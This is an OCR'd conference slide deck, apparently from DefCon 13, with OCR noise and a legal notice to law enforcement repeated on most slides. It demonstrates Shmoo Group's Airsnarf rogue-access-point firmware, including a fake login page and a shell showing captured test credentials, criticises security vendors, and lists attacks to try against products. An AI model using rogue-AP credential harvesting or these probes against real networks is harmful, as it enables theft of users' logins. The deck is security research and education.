Subnet Mask: 255 . 255 . 255 .0 J I 

1 ,T“ 



Gateway: 0 . 0 

! Use the local gateway as the default gateway 



DHCP Server 0 Enable C- Disable 



Starting IP Address: 192.168.1.100 
Maximum Number of 



DHCP Users: 

Client Lease Time: 



50 



Static DNS 1 : 
Static DNS 2: 
Static DNS 3: 



minutes (0 means one day) 
0 



Automatic Configuration • 
DHCP: This setting is most 
commonly used by Cable 
operators 



Host Name: Enter the host name 
provided by your ISP. 

Domain Name: Enter the domain 
name provided by your ISP 

More... 



Local IP Address: This is the 
address of the router. 

Subnet Mask: This is the subnet 
mask of the router 



DHCP Server: ASows the router 
to manage your IP addresses. 
Starting IP Address: The 
address you would Ska to start 
with. 

Maximum number of DHCP 
Users: You may fcmit the number 
of addresses your router hands 
out 

More— 



Time Setting: You may set the 
time manualy. Or choose 
Automatically if you wish to use a 
NTP server to keep the most 
accurate time Choose the time 
zone you are in. The router can 
also adjust automatically for 
daylight savings time. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "work 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42 Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 






Nocat 



CD 



o o 0 G o http://192.168.l-l/Nocat.asp 

Back Forward Reload Stop Location 

LjCamino Info (QNews y-gj Mac News Tabs [G] Coogle 



^7 Google 

Search 






m 



Bookmarks 



Airsnarf 



Access 

Restrictions 



frOTwere Version: Rogue Sguadron ( 

Wireless-G Broadband Router WRT54G 



_ ,, J|. _ Applications 

Security Access Restrictions & Gaming 



Administration 



NoCatSplash 



NoCatSplash: 


Enable O Disable 


Gateway Name 


The Shmoo Croup 


Home Page 


http://airsnarf.shmoo.com/ 


Allowed Web Hosts 


shmoo.com 


Document Root 


/usr/share/nocat/htdocs/ 


Exclude Ports 


25 


Login Timeout 


864C 


Veibosity 


0 


Route Only: 


C Enable ^ Disable 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications'' as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



^ ^ ^ Airsnarf - A Rogue AP Login Page (_) 



O. 0 O 

Back Forwar J Reload Stop 










O http:// 192. 168. l.l:5280/?redirect=http963A//www.google.com/ 


Q,” Google 


k|| 




Location 


Search Bookmarks 


_JCamino Info ji^News uTpMac News Tabs 


|Gl Coogle 




Please enter your username and password. 



U semamc: 

Password: 

f Login ^ f Cancel 'I 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 









ssh 



r oot : 3l92 . 1.68 .1.1 's password : 

A irsnarf 

Rogue Squadron v8.1 Firmware for the WRT54G 

by The Shmao Group 

http iff cl irsnarf .shrnoo .coin 

ProoT -of -concept rogue AR firmware for the 
Linksys WRT54G, based on the Ewrt, f i. tinware 
V0.3 beta 1 by Port Less Networks, which is 
based on the Linksys 3.81.3 codebase. 

THIS FIRMWARE IS INTENDED FOR DEMONSTRATION 
PURPOSES ONLY! USE OR ABUSE AT YOUR OWN RISK! 



BusyBox vl . 00 (2005 , 07 . 19-00 : 42+0800 ) Bui 1 1- 1 n she L t ( ash ) 

Enter 'help 1 for a List of built-in commands . 

a irsnarf -# cat /opt/a irsnarfs.txt 
redirect=http ://www .goog Le.com/ 

username=shmoouser password-shmoopassword accept_terms=yss redirect=http ://www .g 
oog L e . com/ mode_ L og i n=Log i n 
a irsnarf -# jj 



T 

A 






http ://airsnarf . shmoo . com/rogue_squadron/ 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Heeeeeeere's Rodney! 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Shooting Your Security Wad 



(Never let Beetle title your slides) 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Why is Rodney ranting 

now? 

Been doing product reviews 
(public and private) 

Keep seeing some incredibly lame 
product "features" 

There's a risk of FPGS (Ford 
Pinto Gastank Syndrome) 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Four Hard Questions? 

Does your product produce an 
external log? 

Do you have a security incident report 
mechanism? 

Does your product store it's key 
material securely? 

Do you provide a secure management 
interface? 



4&SP 







Why are these hard questions in 2005? 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Don't make things worse 

• Security products should NOT 
increase the attack surface. 

• Central servers are single points 
of failure 

• Communicate securely among 
your components 

• Don't run sloppy distro's 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Stupid Vendor Tricks 

No logging when there are errors 
No logging upon start-up 
Self-signed certificates ONLY 
No capability for change control 
Incoherent documentation/UI 
Follow the damn protocol specs 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Attacks you should try 

• Run NMAP and NESSUS (or your fav 
commercial equivalent) 

• telnet 10.0.0.1 22 

• openssl s client -connect 10.0.0.1:443 -ssl2 

• Go after the web interface 

• Ettercap 

• Google for a random relevant exploit and try 
it (or one off a security mailing list) 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



How you can make things 

better 

• (We're not the bad guys. We're 
trying to be educated consumers. 
Here's some things you can do to 
help make things better.) 

• If you show how one of these 
possible flaws can be broke, 
submit to present it at shmoocon 
2006 ) 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which rnay be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







How you can make things 

better 

• Report flaws to the vendor 

• Document risks caused by 
security gear 

• Disrupt future purchases of 
clueless security gear 

• Encourage future purchases of 
cluefull security gear 

• Show how easy it is to break 
things 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Did you want more gear? 

Okey dokey. 

CowboyM, show 'em what 

you got. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



802.1 lbloodhound 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wori< 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worir 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wor* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42 Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wori« 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







Kicks Ass 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Announcing PotKettle 

Industries 

• Exploit the exploiters 

• ??? 

• • • 

• Profit 










DefCon 13 




NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 



Multihtml.c exploit 
remote vulnerability 

Category: Remote for Remote 
Vendor: bansh33 



In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
